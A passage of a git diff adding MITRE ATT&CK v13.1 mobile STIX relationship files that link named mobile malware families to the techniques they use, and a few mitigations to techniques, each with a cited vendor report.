"https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.178Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has fingerprinted devices to uniquely identify them.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bb6f851-4302-4936-a98e-d23feecb234d.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bb6f851-4302-4936-a98e-d23feecb234d.json new file mode 100644 index 0000000000000000000000000000000000000000..3084d6b49a587d50334dea03b7b7d5923b9d885c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bb6f851-4302-4936-a98e-d23feecb234d.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--61f10f6d-ebb5-4fee-a8ba-d2b9c886ef9b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0bb6f851-4302-4936-a98e-d23feecb234d", + "type": "relationship", + "created": "2020-06-02T14:32:31.777Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.777Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) exploits a WebKit vulnerability to achieve root access on the device.(Citation: Volexity Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bbe5936-04bf-4c9a-bb43-cd37f36c3349.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bbe5936-04bf-4c9a-bb43-cd37f36c3349.json new file mode 100644 index 0000000000000000000000000000000000000000..c8c025ab7fd66e1afed166a8850fe96bfd57a894 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bbe5936-04bf-4c9a-bb43-cd37f36c3349.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a3ef401c-9c84-4e71-b65a-4bacd2cf1652", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0bbe5936-04bf-4c9a-bb43-cd37f36c3349", + "created": "2020-10-29T19:01:13.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft MalLockerB", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:44:31.187Z", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) has registered to receive 14 different broadcast intents for automatically triggering malware payloads. (Citation: Microsoft MalLockerB)", + "relationship_type": "uses", + "source_ref": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d70aaf50-29b7-4687-98ea-ffaa3fa858c0.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d70aaf50-29b7-4687-98ea-ffaa3fa858c0.json new file mode 100644 index 0000000000000000000000000000000000000000..fe8cf0ec79835dd968fc3db141b706196a26b862 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d70aaf50-29b7-4687-98ea-ffaa3fa858c0.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--7cdf0361-ce5a-448d-b154-262f7f7882bf", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d70aaf50-29b7-4687-98ea-ffaa3fa858c0", + "type": "relationship", + "created": "2020-12-24T21:55:56.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.692Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has searched for specific existing data directories, including the Gmail app, Dropbox app, Pictures, and thumbnails.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d87b468e-f610-4e95-8dfb-8cf029f0e891.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d87b468e-f610-4e95-8dfb-8cf029f0e891.json new file mode 100644 index 0000000000000000000000000000000000000000..7da7f5e8217307b620c81ede91fae49ffd12f5da --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d87b468e-f610-4e95-8dfb-8cf029f0e891.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--cef2e911-eda8-4611-a775-5a36ec96df83", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d87b468e-f610-4e95-8dfb-8cf029f0e891", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ArsTechnica-HummingBad", + "description": "Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[HummingBad](https://attack.mitre.org/software/S0322) can exploit unfixed vulnerabilities in older Android versions to root victim phones.(Citation: ArsTechnica-HummingBad)", + "relationship_type": "uses", + "source_ref": "malware--c8770c81-c29f-40d2-a140-38544206b2b4", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--db34a2c8-01e0-4cd3-a497-0f4bca36812a.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--db34a2c8-01e0-4cd3-a497-0f4bca36812a.json new file mode 100644 index 0000000000000000000000000000000000000000..610b62d38745f2c15443e544f8471183701cbf9e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--db34a2c8-01e0-4cd3-a497-0f4bca36812a.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--667a65b7-e4fb-4522-a2ed-10ebbb4ea0e2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--db34a2c8-01e0-4cd3-a497-0f4bca36812a", + "created": "2020-01-27T17:05:58.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:27:51.998Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain the device\u2019s call log.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ddfc5d8c-750d-424a-88d9-acc99bc5f69e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ddfc5d8c-750d-424a-88d9-acc99bc5f69e.json new file mode 100644 index 0000000000000000000000000000000000000000..3862b8aa532a5f59898aea5aac95c5bc45096d56 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ddfc5d8c-750d-424a-88d9-acc99bc5f69e.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--4b3e2654-7086-43ac-93fe-ba7f00ce7491", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ddfc5d8c-750d-424a-88d9-acc99bc5f69e", + "created": "2022-03-30T19:29:07.379Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Inform users that device rooting or granting unnecessary access to the accessibility service presents security risks that could be taken advantage of without their knowledge.", + "modified": "2022-03-30T19:29:07.379Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e0121f6c-0312-4fff-9d6c-0a8aea945bea.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e0121f6c-0312-4fff-9d6c-0a8aea945bea.json new file mode 100644 index 0000000000000000000000000000000000000000..d1f76da7b8c937fc587837ded1ba2e361792db42 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e0121f6c-0312-4fff-9d6c-0a8aea945bea.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--8978ef50-9a97-40bc-b598-dc6fa590a4d3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e0121f6c-0312-4fff-9d6c-0a8aea945bea", + "created": "2023-02-06T19:45:58.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T22:08:45.192Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can use the open-source project RetroFit for C2 communication.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e245e45a-71a8-408d-8f32-7b7337bffc26.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e245e45a-71a8-408d-8f32-7b7337bffc26.json new file mode 100644 index 0000000000000000000000000000000000000000..2c76a67e6c56bf1d4bea0a3d4f925ab713c74f03 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e245e45a-71a8-408d-8f32-7b7337bffc26.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--f4343702-5b7d-4a1f-ab62-7ae81dfc3f50", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e245e45a-71a8-408d-8f32-7b7337bffc26", + "created": "2023-01-18T19:19:58.007Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:10:23.208Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can hide its application icon.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e457921c-4a0b-4d6e-92e7-553929ddf943.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e457921c-4a0b-4d6e-92e7-553929ddf943.json new file mode 100644 index 0000000000000000000000000000000000000000..6ac0b7d2975fbae394c72c66e363eb420487bec6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e457921c-4a0b-4d6e-92e7-553929ddf943.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--cf4566f9-d282-4d02-8f9b-f77dd5da048e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e457921c-4a0b-4d6e-92e7-553929ddf943", + "created": "2023-02-06T18:51:14.919Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:23:48.120Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can download and install additional malware after initial infection.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e7af5be1-721f-40c5-b647-659243a0a14b.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e7af5be1-721f-40c5-b647-659243a0a14b.json new file mode 100644 index 0000000000000000000000000000000000000000..e83625b890a38213c01fae75e05e22c6b4316088 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e7af5be1-721f-40c5-b647-659243a0a14b.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--98c7323b-08ee-4e09-9fee-4f42b1084270", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e7af5be1-721f-40c5-b647-659243a0a14b", + "type": "relationship", + "created": "2020-04-08T15:41:19.321Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2021-09-20T13:50:02.057Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can record phone calls and audio.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e99fd1c9-441f-41bc-83a1-e7bed8f2d7fb.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e99fd1c9-441f-41bc-83a1-e7bed8f2d7fb.json new file mode 100644 index 0000000000000000000000000000000000000000..f21b020931c7aa9830ec2493e5e05a0d7e4386fa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e99fd1c9-441f-41bc-83a1-e7bed8f2d7fb.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b8daa543-dd34-458a-8d00-616a43b4b6fb", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e99fd1c9-441f-41bc-83a1-e7bed8f2d7fb", + "type": "relationship", + "created": "2020-12-17T20:15:22.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.444Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can load additional Dalvik code while running.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eb6dbe2a-6f76-4bce-ab37-66ec67148041.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eb6dbe2a-6f76-4bce-ab37-66ec67148041.json new file mode 100644 index 0000000000000000000000000000000000000000..e552363428c4caad349f0e4e0b0c8c572ad05aed --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eb6dbe2a-6f76-4bce-ab37-66ec67148041.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--34b6435d-249c-4c39-b7b8-f4da6dab6c77", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eb6dbe2a-6f76-4bce-ab37-66ec67148041", + "type": "relationship", + "created": "2017-10-25T14:48:53.742Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-06-24T15:08:18.481Z", + "description": "Enterprise policies should prevent enabling USB debugging on Android devices unless specifically needed (e.g., if the device is used for application development).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eda3c5c4-d062-48d3-a78e-051f0c9d62f6.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eda3c5c4-d062-48d3-a78e-051f0c9d62f6.json new file mode 100644 index 0000000000000000000000000000000000000000..6167b21231b6c732fdbe8f635a4a590351cf2f76 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--eda3c5c4-d062-48d3-a78e-051f0c9d62f6.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--f1e1fb3d-fed6-4e08-96a9-a123766619c4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--eda3c5c4-d062-48d3-a78e-051f0c9d62f6", + "created": "2023-02-28T20:31:55.191Z", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T20:31:55.191Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can access app notifications.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f012feab-5612-429f-81bd-ff75d6ffd04e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f012feab-5612-429f-81bd-ff75d6ffd04e.json new file mode 100644 index 0000000000000000000000000000000000000000..0a9640fe2d08cc014428a17bca47471cdc65d533 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f012feab-5612-429f-81bd-ff75d6ffd04e.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--2410f5af-821c-4966-b2c8-6075cc670497", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f012feab-5612-429f-81bd-ff75d6ffd04e", + "created": "2022-04-05T17:03:34.941Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:03:34.941Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f31490e8-ef81-40d5-bba9-24ca580d2ee6.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f31490e8-ef81-40d5-bba9-24ca580d2ee6.json new file mode 100644 index 0000000000000000000000000000000000000000..25d279e6a926282b1a88f514ef482035620e773c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f31490e8-ef81-40d5-bba9-24ca580d2ee6.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--bc818c2f-5196-44b4-b1af-28fad93b7cb2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f31490e8-ef81-40d5-bba9-24ca580d2ee6", + "created": "2020-01-21T14:20:50.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender - Triout 2018", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout \u2013 Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020.", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:46:20.857Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) includes code to hide its icon, but the function does not appear to be called in an analyzed version of the software.(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f552ee2f-5e6a-47a1-b6a5-d5e5594feb0d.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f552ee2f-5e6a-47a1-b6a5-d5e5594feb0d.json new file mode 100644 index 0000000000000000000000000000000000000000..9dfd23dd44c376fbded34c70e8058f2417c495b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f552ee2f-5e6a-47a1-b6a5-d5e5594feb0d.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--7dffae64-833d-4b3c-9ff1-816d2109e120", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f552ee2f-5e6a-47a1-b6a5-d5e5594feb0d", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:49.112Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads information about installed packages.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f65087b4-adf2-4292-a711-7ae829e91397.json 